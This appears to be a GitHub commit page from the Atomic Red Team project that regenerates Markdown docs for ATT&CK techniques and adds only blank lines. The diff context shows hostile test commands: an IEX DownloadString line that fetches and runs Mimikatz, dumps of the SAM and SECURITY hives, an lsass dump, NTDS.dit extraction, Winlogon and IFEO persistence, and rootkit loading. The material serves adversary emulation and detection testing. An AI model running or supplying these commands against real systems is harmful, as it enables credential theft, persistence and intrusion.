Generate docs from job=validate_atomics_generate_docs branch=master

dglauche · Aug 30, 2019 · 440e85a · 440e85a
1 parent 019b63f
commit 440e85a
Show file tree

Hide file tree

Showing 140 changed files with 1,177 additions and 0 deletions.
diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md
@@ -32,6 +32,9 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 #### Run it with `powershell`! ```
 dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -50,6 +53,9 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 #### Run it with `command_prompt`! ```
 rar a -r #{output_file} #{input_file}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -68,6 +74,9 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 #### Run it with `sh`! ```
 zip #{output_file} #{input_files}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -85,6 +94,9 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 #### Run it with `sh`! ```
 gzip -f #{input_file}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -103,4 +115,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 #### Run it with `sh`! ```
 tar -cvzf #{output_file} #{input_file_folder}
 ```
+
+
+
 <br/>
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
@@ -172,6 +172,9 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
 #### Run it with `powershell`! ```
 IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
 ```
+
+
+
 <br/>
 <br/>
 
@@ -184,6 +187,9 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
 #### Run it with `command_prompt`! ```
 gsecdump -a
 ```
+
+
+
 <br/>
 <br/>
 
@@ -201,6 +207,9 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
 #### Run it with `command_prompt`! ```
 wce -o #{output_file}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -216,6 +225,9 @@ reg save HKLM\sam sam
 reg save HKLM\system system
 reg save HKLM\security security
 ```
+
+
+
 <br/>
 <br/>
 
@@ -234,6 +246,9 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
 #### Run it with `command_prompt`! ```
 procdump.exe -accepteula -ma lsass.exe #{output_file}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -256,6 +271,9 @@ Manager and administrative permissions.
   Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
 
 
+
+
+
 <br/>
 <br/>
 
@@ -281,6 +299,9 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
   Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
 
 
+
+
+
 <br/>
 <br/>
 
@@ -300,6 +321,9 @@ subsequent domain controllers without the need of network-based replication.
 #### Run it with `command_prompt`! ```
 ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
 ```
+
+
+
 <br/>
 <br/>
 
@@ -317,6 +341,9 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 #### Run it with `command_prompt`! ```
 vssadmin.exe create shadow /for=#{drive_letter}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -341,4 +368,7 @@ copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
 copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
 reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
 ```
+
+
+
 <br/>
diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md
@@ -35,6 +35,9 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
 #### Run it with `powershell`! ```
 Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
 ```
+
+
+
 <br/>
 <br/>
 
@@ -52,6 +55,9 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
 #### Run it with `powershell`! ```
 Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
 ```
+
+
+
 <br/>
 <br/>
 
@@ -70,4 +76,7 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
 New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
 Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
 ```
+
+
+
 <br/>
diff --git a/atomics/T1005/T1005.md b/atomics/T1005/T1005.md
@@ -26,4 +26,7 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
 cd ~/Library/Cookies
 grep -q "#{search_string}" "Cookies.binarycookies"
 ```
+
+
+
 <br/>
diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md
@@ -30,6 +30,9 @@ sc start #{service_name}
 sc stop #{service_name}
 wmic service where (displayname like "#{service_name}") get name
 ```
+
+
+
 <br/>
 <br/>
 
@@ -47,4 +50,7 @@ Enumerates started system services using net.exe and writes them to a file. This
 #### Run it with `command_prompt`! ```
 net.exe start >> #{output_file}
 ```
+
+
+
 <br/>
diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md
@@ -23,4 +23,7 @@ Uses dd to add a zero to the binary to change the hash
 #### Run it with `sh`! ```
 dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
 ```
+
+
+
 <br/>
diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md
@@ -27,4 +27,7 @@ Compiles and executes C# code to list main window titles associated with each pr
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
 #{output_file_name}
 ```
+
+
+
 <br/>
diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md
@@ -52,4 +52,7 @@ reg save HKLM\Security security.hive
 reg save HKLM\System system.hive
 reg save HKLM\SAM sam.hive
 ```
+
+
+
 <br/>
diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md
@@ -29,6 +29,9 @@ Loadable Kernel Module based Rootkit
 #### Run it with `sh`! ```
 sudo insmod #{rootkit_file}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -46,6 +49,9 @@ Loadable Kernel Module based Rootkit
 #### Run it with `sh`! ```
 sudo modprobe #{rootkit_file}
 ```
+
+
+
 <br/>
 <br/>
 
@@ -70,4 +76,7 @@ It would be wise if you only run this in a test environment
 #### Run it with `command_prompt`! ```
 puppetstrings #{driver_path}
 ```
+
+
+
 <br/>
diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md
@@ -51,6 +51,9 @@ This allows adversaries to execute the attached process
 #### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
+
+
+
 <br/>
 <br/>
 
@@ -68,6 +71,9 @@ This allows adversaries to execute the attached process
 #### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
+
+
+
 <br/>
 <br/>
 
@@ -85,6 +91,9 @@ This allows adversaries to execute the attached process
 #### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
+
+
+
 <br/>
 <br/>
 
@@ -102,6 +111,9 @@ This allows adversaries to execute the attached process
 #### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
+
+
+
 <br/>
 <br/>
 
@@ -119,6 +131,9 @@ This allows adversaries to execute the attached process
 #### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
+
+
+
 <br/>
 <br/>
 
@@ -136,6 +151,9 @@ This allows adversaries to execute the attached process
 #### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
+
+
+
 <br/>
 <br/>
 
@@ -153,4 +171,7 @@ This allows adversaries to execute the attached process
 #### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
+
+
+
 <br/>
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
@@ -24,6 +24,9 @@ arp -a
 nbtstat -n
 net config
 ```
+
+
+
 <br/>
 <br/>
 
@@ -38,4 +41,7 @@ arp -a
 netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
 ifconfig
 ```
+
+
+
 <br/>
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
@@ -39,6 +39,9 @@ Identify remote systems with net.exe
 net view /domain
 net view
 ```
+
+
+
 <br/>
 <br/>
 
@@ -51,6 +54,9 @@ Identify remote systems via ping sweep
 #### Run it with `command_prompt`! ```
 for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
 ```
+
+
+
 <br/>
 <br/>
 
@@ -63,6 +69,9 @@ Identify remote systems via arp
 #### Run it with `command_prompt`! ```
 arp -a
 ```
+
+
+
 <br/>
 <br/>
 
@@ -75,6 +84,9 @@ Identify remote systems via arp
 #### Run it with `sh`! ```
 arp -a | grep -v '^?'
 ```
+
+
+
 <br/>
 <br/>
 
@@ -87,4 +99,7 @@ Identify remote systems via ping sweep
 #### Run it with `sh`! ```
 for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
 ```
+
+
+
 <br/>
-Original file line number
+Diff line change
@@ Expand Up @@
     cd ~/Library/Cookies
     grep -q "#{search_string}" "Cookies.binarycookies"
     ```
     <br/>